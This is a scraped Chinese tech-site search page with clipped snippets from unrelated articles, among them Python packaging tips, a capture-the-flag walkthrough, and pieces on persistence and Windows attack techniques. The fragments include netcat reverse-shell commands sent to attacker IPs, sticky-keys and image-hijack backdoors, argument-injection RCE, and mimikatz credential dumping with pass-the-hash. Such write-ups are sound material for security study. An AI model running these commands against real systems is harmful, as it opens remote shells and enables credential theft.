首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Impacket使用 - 起始点

\nc64.exe -e cmd.exe 10.10.14.50 333” 目标主机xp_cmdshell运行这条命令即可将cmd弹到攻击机 此时进入桌面可以看到有一个文件,看样子是flag 看到flag...但是还不能提交flag,因为还有一个任务七,是跟提权相关,毕竟这边弹过去cmd也是当前用户权限,相对来说比较低,那么现在进行提权操作 0x05....同样将winpeas用python临时起http服务来让目标下载,注意,这时候就不用在用xp_cmdshell来执行了,直接用刚刚反弹过来cmd去调powershell即可 注意,这里访问文件是去分大小写...通过管理员历史命令登录超级用户 根据任务7提示是找到特定程序输入内容历史记录,由此找到powershellconsolehost_history.txt 查看这个txt看到管理员之前用net.exe...,看到有一个root.txt 试着打开一下 但是当我去打开root.txt时候却提示我找不到文件。

2.3K40

Python 初学者常见错误——我有 Anaconda 了,还能单独安装 Python 吗?

你安装 Python,本质就是电脑安装了一个文件夹,这个文件夹里面有一个 python.exe和各种子文件夹。...那么当我 CMD 里面直接输入 python xxx.py时候,它用是哪个 Python 呢?实际这根本就不关 Python 事情。这是系统环境变量决定。...当你 Python 运行程序需要使用第三方库时候它就会到自己 site-packages文件夹里面去寻找。...当你执行 scrapy命令时候CMD 会去环境变量里面对应各个文件夹中寻找对应 scrapy.exe文件,找到了就运行。...所以,可能会出现这样情况,你 Python 3.7.2环境里面安装了 Scrapy,但是 CMD 里面运行却提示找不到 scrapy命令。

17.4K40
您找到你想要的搜索结果了吗?
是的
没有找到

论如何利用可控参数拼接完成RCE

很容易理解这个使用方式,这里补充一点就是createprocess并不是cmd不能cmd命令方式来分割执行别的程序比如calc && notepad其中notepad并没有正常运行。...那么当我某个程序里找到其传入createprocess函数时第二个变量可控,那么我们就可能可以执行命令。 1....完全可控就不多说了,这里我们简单谈一下参数可控情况。一般来说参数可控,我们需要去查找对应程序各种参数看看能不能达到包含外部执行可能。...但比较有意思是火狐好像不止开了一个进程: 随后进程里出现了一个把参数分割开进程并运行。实际我确实也桌面上看到了两个火狐浏览器。 火狐这个行为给了我一个新希望!...firefox.exe https://www.baidu.com\t-new-window\thttps://beef\t-headless 当我这样时候我发现存在一个问题,如果后台运行了一个headless

27610

jupyter和python关系_jupyter notebook和python

看pycharm界面,就会觉得配合python很好用 Jupyter Notebook 则是一个即时交互性online IDE,支持含Python在内40余种语言,还支持运行R语言和SQL等语言...一个特色是允许把代码写入独立cell中,然后单独执行。这样意味着用户可以测试项目时单独测试特定代码块,无需从头开始执行代码。另一个优势还体现在比一般IDE平台更好灵活性和交互性。...若未能自动打开,可以复制这个网址,手动打开online Jupyter网页;也可以cmd命令行中直接输入jupyter notebook,会输出该网址,并自动打开。...注意在使用Jupyter时,不要关闭Jupyter.exe命令行或者相应cmd命令行,不然电脑认为是退出了这次登录,online网页就不工作了 Jupyter快捷键使用,和其他内容详细介绍参见<安装和...,一定要选择你安装anaconda时那个路径(一定要注意这点,这点我错误集合-pycharm不能import tensorflow有论述),不然anaconda管理各种包是不能使用

95620

Kali Linux渗透基础知识整理(四):维持访问

,先在本地主机运行 nc -l –vv -p 1234 开启1234 端口并监听等待远程主机连接;远程主机上运行 nc -t -e cmd.exe 192.168.1.2 1234 将远程主机 CMD...NC反弹CMDShell Web渗透中,有时候拿到了webshell,我们经常会执行很多命令进行提权等操作,但当我们要尝试很多命令时候,使用webshell执行cmd往往没有本地执行方便,Web程序不稳定...【本地】netcat -l –vv -p 23 【Shell】nc.exe -t -e cmd.exe X.X.X.X 23 其中X.X.X.X为本机公网IP,实际测试需确保外网能访问本机,必要时需端口映射等...【Shell执行】nc.exe -t -e cmd.exe X.X.X.X 23 ? 【本地】成功得到CMDShell,即在本地可直接执行CMD ?...将shellcode注入到其他进程,还有另外一项优势:即使目标系统安全防护工具能够监视可执行程序完整性,只要它不检测内存,那么它就不能发现(插进程)后门程序进程。

2.5K80

Python打包exe文件方法汇总【4种】

py2exe 介绍 py2exe是一个将python脚本转换成windows可独立执行可执行程序(*.exe)工具,这样,你就可以不用装python而在windows系统运行这个可执行程序。...优点: 可以把python打包成exe 缺点: 打包好 exe只能在相同系统下运行,比如你XP系统用py2exe打包好exe只能在XP运行win7肯定有问题,而且也是存在在别的XP机子也可能不能运行...前一个是多进程库,为了解决python用于数据密集型处理情况;后一个用于异步IO处理情况,基本原理就是CPU时钟之间来回切换,简单例子就是爬虫程序爬取网页时候。...如果原.py程序使用图片添加是绝对路径,本地电脑运行时可能不会发现错误。...但是我在打包中发现了一个文件,那就是另一台电脑无法运行…并且实际编译时需要近20分钟,编译时候cpu持续100% 不过如果只是自己电脑运行的话,还是挺好使 官方文档 注意nuitka对python

2.6K10

使用Python写Windows Service服务程序

utm_source=app 1.背景 如果你想用Python开发Windows程序,并让其开机启动等,就必须写成windows服务程序Windows Service,用Python这个事情必须要借助第三方模块...win32serviceutil.ServiceFramework是封装得很好Windows服务框架,本文通过继承它来实现。 通过SvcDoRun方法,实现服务启动,运行服务内业务代码。...所以当我们放自己代码SvcDoRun函数中执行时候,必须确保该函数不退出。...2).当停止服务时候,系统会调用SvcDoStop函数,该函数通过设置标志位等方式让SvcDoRun函数退出,就是正常停止服务。...(5) 原因:权限不够需要以管理员权限运行 解决方案:CDM管理员权限运行 具体方法: 第一步:先进到C:\Windows\SysWOW64\cmd.exe右键,以管理员身份运行; 第二步:在此dos

3.4K10

权限维持之打造不一样映像劫持后门

---- 0x01 前言 “映像劫持”,也被称为“IFEO”(Image File Execution Options),WindowsNT架构系统里,IFEO本意是为一些默认系统环境中运行时可能引发错误程序执行体提供特殊环境设定...出于简化原因,IFEO使用忽略路径方式来匹配它所要控制程序文件名,所以程序无论放在哪个路径,只要名字没有变化,它就运行出问题。 下面呢,我们聊一聊如何打造不一样“映像劫持”后门。...事实该过程中,Windows还会在注册表上述路径中查询所有的映像劫持子键,如果存在和该程序名称完全相同子键,就查询对应子健中包含”dubugger”键值名,并用其指定程序路径来代替原始程序...大家一定都知道映像劫持后门,以下注册表中sethc.exe项添加一个Debugger字符值(REG_SZ),并且赋值为cmd.exe执行路径为C:\windows\system32\cmd.exe...使用Process Explorer进行检测进程变化发现键入五下Shift执行时,先执行sethc.exe程序,当sethc.exe程序静默退出时,执行cmd.exe程序运行效果如下: 0x05 来看一看它原理

1.8K10

频频闯祸 JNDI,到底是个什么 垃圾 玩意儿?

当然,随着SpringBoot单体发布模式流行,现在用这种方式来获取数据库配置古董公司,是越来越少了。 比如,我们可以tomcatserver.xml里,配置一个叫做xjjdogDB资源。...这个名字,它就能加载正确配置。...程序启动起来,到底加载什么东西,要看运行环境配置什么东西。 具体实现的话,不就是一个可以根据key获取valueHashMap嘛。...当它从本地加载相应类时候,如果加载不到,它干了一件不该干但又不得不干的事情,那就是从网络代码里面构造相应对象! 这下,炫肌肉同时,可完犊子了。...python -m http.server 8000 能够发起外网请求服务器,将会乖乖自动从我们指定服务器捞下非法class文件进行加载。

49320

别再问我Python打包成exe了!(终极版)

众所周知,Python脚本不能在没有安装Python机器运行。 那我们如果写了一个数据分析/自动化办公小脚本,想分享给同事小姐姐使用,可她电脑又没有装Python。...这个时候如果将脚本打包成exe文件,微信发送给她,即使她电脑没有安装Python解释器,这个exe程序也能在上面运行。岂不美哉? ?...(当然,想通过帮安装Python跟小姐姐建立感情的话,就当我没说) 安装Pyinstaller 首先我们要先安装Pyinstaller,直接在cmd使用pip命令 pip install pyinstaller...3、为了防止打包时候有些库没安装好,可以先在虚拟环境中执行一下Python脚本。运行无误的话再打包,比较保险。 ?...32位程序,但是如果不考虑32位系统的话无所谓,直接python64位版本直接打包就可以,只是只能在win64位系统跑。

14K40

十八.病毒攻防机理及WinRAR恶意劫持漏洞(bat病毒、自启动、蓝屏攻击)

命令提示下输入批处理文件名称,或者双击该批处理文件,系统就会调用cmd.exe按照该文件中各个命令出现顺序来逐个运行它们。使用批处理文件或脚本,可以简化日常或重复性任务。...常用方法包括: 病毒融合Autoruns自启动机制 下图展示了Autoruns软件查看Windows操作系统自启动选项,如果病毒本身能很好地结合这套机制,它可以事情非常多,并且具有很好隐蔽性。...但它能让我们了解脚本病毒某些功能,其原理是不断打开CMD程序,占用系统资源从而导致死机,并且每次开机都会自动启。 PS:这里强调一句,建议大家虚拟机中运行该代码。...同时不能双击exp.py,需要Python运行代码。 第四步,此时在当前文件夹生成了test.rar文件,将该压缩包发送给其他用户,如果目标电脑存在WinRAR漏洞,则会造成影响。...Windows中只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态,最后那个是Win32子系统,ntsd本身需要它。

1.8K60

python 异步 asyncawait -1.一文理解什么是协程

前言 Python 3.5 版本中引入了关于协程语法糖 async 和 await, python3.7 版本可以通过 asyncio.run() 运行一个协程。...所以建议大家学习协程时候使用 python3.7+ 版本,本文示例代码 python3.8 运行。 什么是协程?...大家都知道,洗衣机洗衣服是需要等待时间,如果10个洗衣,1人负责1台洗衣机,这样效率肯定会提高,但是不觉得浪费资源吗?明明1 个人能做事,却要10个人来。...协程很适合处理IO密集型程序效率问题。协程本质是个单线程,它不能同时将 单个CPU 多个核用上,因此对于CPU密集型程序协程需要和多进程配合。...早期面向进程设计计算机结构中,进程是程序基本执行实体; 在当代面向线程设计计算机结构中,进程是线程容器。 程序是指令、数据及其组织形式描述,进程是程序实体。

3.8K40

粘滞键项权限维持

,坏处就是自己不能直接操作了: ?...该所有者之前,直接编辑其权限都是灰色不能修改,有了所有权之后,便可以编辑其权限,这里需要给予自己权限,如下图: ?...之后window下执行以下命令: cd c:\windows\system32 move sethc.exe sethc.exe.bak //备份sethc.exe copy cmd.exe sethc.exe...同时,当我权限维持时,如果留下了粘滞键后门,当用户修改密码后,我们远程连接时可能会出现无法登录情况,这时候上面这种后门进行权限维持就比较有用了: 第一种:创建cmd.exe粘滞键,之后登录界面按下...替换为Utilman.exe(快捷键为: Win + U)或者osk.exe(屏幕键盘Win + U启动再选择) Narrator.exe (启动讲述人Win + U启动再选择) Magnify.exe

1.2K20

三面面试官:运行 npm run xxx 时候发生了什么?

vue项目 npm run serve时候,实际就是执行了vue-cli-service serve 这条命令。...[image.png] 我:如果我们 cmd运行时候,windows 一般是调用了 vue-cli-service.cmd,这个文件,这是 windows 下批处理脚本: @ECHO off...\@vue\cli-service\bin\vue-cli-service.js" %* 所以当我运行vue-cli-service serve这条命令时候,就相当于运行 node_modules/...然后这个脚本会使用 node 去运行vue-cli-service.js这个 js 文件 由于 node 中可以使用一系列系统相关 api ,所以在这个 js 中可以很多事情,例如读取并分析运行这条命令目录下文件...(电话挂断) tmd,c 总结 运行 npm run xxx时候,npm 会先在当前目录 node_modules/.bin 查找要执行程序,如果找到则运行; 没有找到则从全局 node_modules

1.4K30

别再问我Python打包成exe了!(终极版)

如果对这块已经很熟悉小伙伴,可以直接下滑到本文下半部分。 为什么要打包? 众所周知,Python脚本不能在没有安装Python机器运行。...这个时候如果将脚本打包成exe文件,微信发送给她,即使她电脑没有安装Python解释器,这个exe程序也能在上面运行。岂不美哉? ?...(当然,想通过帮安装Python跟小姐姐建立感情的话,就当我没说) 安装Pyinstaller 首先我们要先安装Pyinstaller,直接在cmd使用pip命令 pip install pyinstaller...3、为了防止打包时候有些库没安装好,可以先在虚拟环境中执行一下Python脚本。运行无误的话再打包,比较保险。 ?...32位程序,但是如果不考虑32位系统的话无所谓,直接python64位版本直接打包就可以,只是只能在win64位系统跑。

1.4K20

深入浅出Windows BATCH

1.什么是Windows BATCH BATCH也就是批处理文件,有时简称为BAT,是Windows平台上一种可运行脚本,与*nix(Linux和Unix)Shell脚本和其它脚本(Perl,Python...)等是一样,实质就是一个文本文件,可是用特定软件去解释时候,就变成了可运行脚本。...Windows,可运行脚本就是BATCH文件,也叫批处理文件,这是从DOS时代遗留下来名字,意思就是把非常多命令放到一起来运行。...WindowsCMD没有*nixTerminal那么强大,所以全然在其内开发有点不切实际,尽管有非常多工具能够让CMD变得强大些,可是还是无法达到*nix那样地步,由于它们从根本就是走不同路线...怎样使用BAT BAT是一个可运行脚本,也就是说它跟一个*.exe运行程序一样,仅仅要双击它就能够运行了。

72910

什么是渗透_mitotracker deep red

注:但是安装了KB2871997补丁或者系统版本大于windows server 2012时,系统内存中就不再保存明文密码,这样利用mimikatz就不能从内存中读出明文密码了。...0x03 读取域控中域成员Hash 3.1 域控本地读取 注:域控以域管理员身份执行mimikatz 方法一:直接执行 #提升权限 privilege::debug 抓取密码 lsadump:...4.2 域环境 域环境中,当我们获得了域内用户NTLM哈希值,我们可以使用域内一台主机用mimikatz对域控进行哈希传递攻击。执行完命令后,会弹出cmd窗口。...4.3 MSF进行哈希传递 有些时候当我们获取到了某台主机Administrator用户LM-Hash和 NTLM-Hash ,并且该主机445端口打开着。...详情请见:链接 6.2 隐藏功能 管理员常常会禁用一些重要程序运行,比如cmd、regedit、taskmgr,此时不方便渗透进一步进行,这里除了去改回原来配置,还可以借助mimikatz一些功能

61910

针对黑客Windows文件传输总结

要启动 Apache Web 服务器,请将要向受害者提供文件放在/var/www/html中,然后运行命令: systemctl start apache2 现在您将有一个端口 80 运行网络服务器...这可能很烦人,因为当服务器未在端口 80 运行时,您始终必须将端口号添加到 URL 中。 我个人使用 Python HTTP 服务器次数多于任何其他方法。.../upload.php 3.从攻击者FTP服务器下载文件 3.1攻击者机器设置 FTP 服务器 我们攻击者机器,我们可以使用许多不同 FTP 程序来启动我们服务器;然而,我们希望使用一些轻量级东西...3.3从攻击者FTP服务器下载文件:cmd.exe 当我们没有 GUI 访问权限时会发生什么?...对于此示例,攻击者计算机上端口 443 启动 netcat 侦听器,然后受害者执行以下命令: \\172.16.1.30\hax\nc.exe 172.16.1.30 443 -e cmd.exe

42111

可视化打包exe,这个神器绝了

大家好,今天给大家推荐一个可视化神器,它就是Auto-py-to-exe,它是一个用于将Python程序打包成可执行文件图形化工具。...安装Auto-py-to-exe 首先我们要确保我们Python环境要大于或等于2.7然后cmd里面输入:pip install auto-py-to-exe 输入完成之后,pip就会安装auto-py-to-exe...安装完成之后,我们就可以cmd输入:auto-py-to-exe,来启动auto-py-to-exe程序了。 出现上述图片,auto-py-to-exe就安装成功了。...Auto-py-to-exe部分选项介绍 使用Auto-py-to-exe打包python程序时候,有许多配置选项需要我们去指定,能正确知道这些选项作用是十分重要。...python程序打包 (4) Icon:用于指定打包程序图标 Auto-py-to-exe实战 本节主要以一个计算器程序来介绍如何使用Auto-py-to-exe来打包程序

1.1K10
领券